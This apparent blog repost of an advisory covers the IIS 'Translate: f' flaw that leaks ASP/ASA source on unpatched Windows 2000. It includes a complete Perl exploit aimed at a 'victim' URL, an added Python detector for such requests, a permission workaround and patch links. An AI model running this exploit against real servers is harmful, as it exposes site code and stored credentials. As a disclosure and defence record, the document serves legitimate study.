
Saturday, 12 November 2011

Win2000 "Translate: f" problem leaks ASP/ASA files

Source: Security Focus

Reference: Translate:f summary, history and thoughts by ddoc@MIA.CZ

I. Vulnerability information

WebDAV in Windows 2000 and Office 2000 (including FrontPage 2000 and FrontPage 2000 Server Extensions) has a security problem known as Translate: f.

When someone sends an HTTP GET request containing a "Translate: f" header for an ASP/ASA (or other script) file on the target machine, Windows 2000 without the SP1 patch (and not many have patched yet :) returns the source code of the ASP/ASA file instead of the processed output it should return (a special character, "/", also has to be appended to the end of the URL).

Although this vulnerability appeared in Windows 2000, some sites that run only IIS 4.0 have nonetheless installed FrontPage Server Extensions 2000, so the impact may extend to IIS 4.0 machines as well.
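As an added example (not part of the original article), the following Python snippet parses raw HTTP request heads and flags the request shape described above: a GET for an ASP/ASA (or similar) script path carrying a Translate: f header, with the extra trailing "/" or "\" that triggers source disclosure. The sample requests are constructed, and the script extensions beyond .asp/.asa are an assumption.

```python
from typing import Dict, List, Optional, Tuple

# Server-side script extensions whose source the bug disclosed. The page
# names ASP/ASA; the others are an assumption ("or other script files").
SCRIPT_EXTS = (".asp", ".asa", ".asax", ".inc")

def parse_request_head(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split an HTTP/1.x request head into (method, target, headers).
    Header names are lower-cased; the body, if any, is ignored."""
    head = raw.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers

def classify(raw: str) -> Optional[str]:
    """Return a verdict label for one request head, or None if not of interest.
    Translate: f is also sent by legitimate FrontPage/WebDAV authoring
    clients, so only GETs aimed at script files are flagged."""
    method, target, headers = parse_request_head(raw)
    if method.upper() != "GET" or headers.get("translate", "").lower() != "f":
        return None
    path = target.split("?", 1)[0]          # ignore the query string
    trailing = path.endswith(("/", "\\"))   # the extra character from the write-up
    stem = path.rstrip("/\\")
    if not stem.lower().endswith(SCRIPT_EXTS):
        return None
    return "translate_f_source_disclosure" if trailing else "translate_f_on_script"

def scan(requests: List[str]) -> List[Tuple[int, str]]:
    """Run classify() over request heads; return (index, verdict) for hits."""
    hits = []
    for i, req in enumerate(requests):
        verdict = classify(req)
        if verdict:
            hits.append((i, verdict))
    return hits

# Constructed sample traffic (not real captures).
SAMPLES = [
    "GET /global.asa\\ HTTP/1.0\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    "GET /default.asp HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
    "PROPFIND /docs/ HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    "GET /default.asp?x=1 HTTP/1.0\r\nHost: www.example.com\r\nTranslate: F\r\n\r\n",
]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLES):
        print(idx, verdict)
```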

II. Exploitation method

smiler published an exploit for this vulnerability written in Perl:

-----------------------------start------------------------------------------------
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with success against IIS 5.0. Maybe it works
# against IIS 4.0 using a shared drive but I haven't tested
# it yet.
# Get the source code of any script from the server
# using this exploit.
# This code was written after Daniel Docekal brought
# this issue in BugTraq.
# Cheers 351 and FractalG :)

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

if (not $ARGV[0]) {
    print qq~
Geee it's running !! kewl :)))
Usage : srcgrab.pl <url>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~;
    exit;
}

my $victimurl = $ARGV[0];

# Create a user agent object
my $ua = LWP::UserAgent->new;

# Create a request; here is the backslash at the end of the url ;)
my $req = HTTP::Request->new(GET => $victimurl . '\\');
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f');    # Here is the famous translate header :))
$req->content('match=www&errors=0');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
    print $res->content;
} else {
    print $res->error_as_HTML;
}
---------------------------------end---------------------------------------

To use this program you may need to download a few Perl modules (search for them at http://www.perl.org :)

1. libwww-perl-5.48.tar.gz
2. URI-1.09.tar.gz
3. HTML-Parser-3.11.tar.gz

Each package is only a few tens of KB. After downloading and unpacking it, enter the directory and run

# perl Makefile.PL && make && make install

and that is it. Have fun :)

(Yesterday I made a fool of myself: I appended a "?" to the URL, was able to reach part of the ASP, thought I had succeeded, got smug and boasted loudly; later a friend pointed out that what came back was the processed output, not the source code. I suddenly realized this and was greatly embarrassed, so I add this note as a warning to myself.)

III. Solutions:

1. adam of nsfocus proposed the following temporary workaround:

Chinese version:
iisreset /stop
c:
cd \WINNT\system32\inetsrv
cacls httpext.dll /d everyone
Are you sure (Y/N)?y
iisreset /start

2. Official fix

Download and install the patch:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769 or

http://download.microsoft.com/download/win2000platform/Patch/Q256888/NT5/EN-US/Q256888_W2K_SP1_x86_en.EXE

The problem can also be fixed by installing Windows 2000 Service Pack 1:

http://www.microsoft.com/windows2000/downloads/recommended/sp1/
http://202.101.106.13/
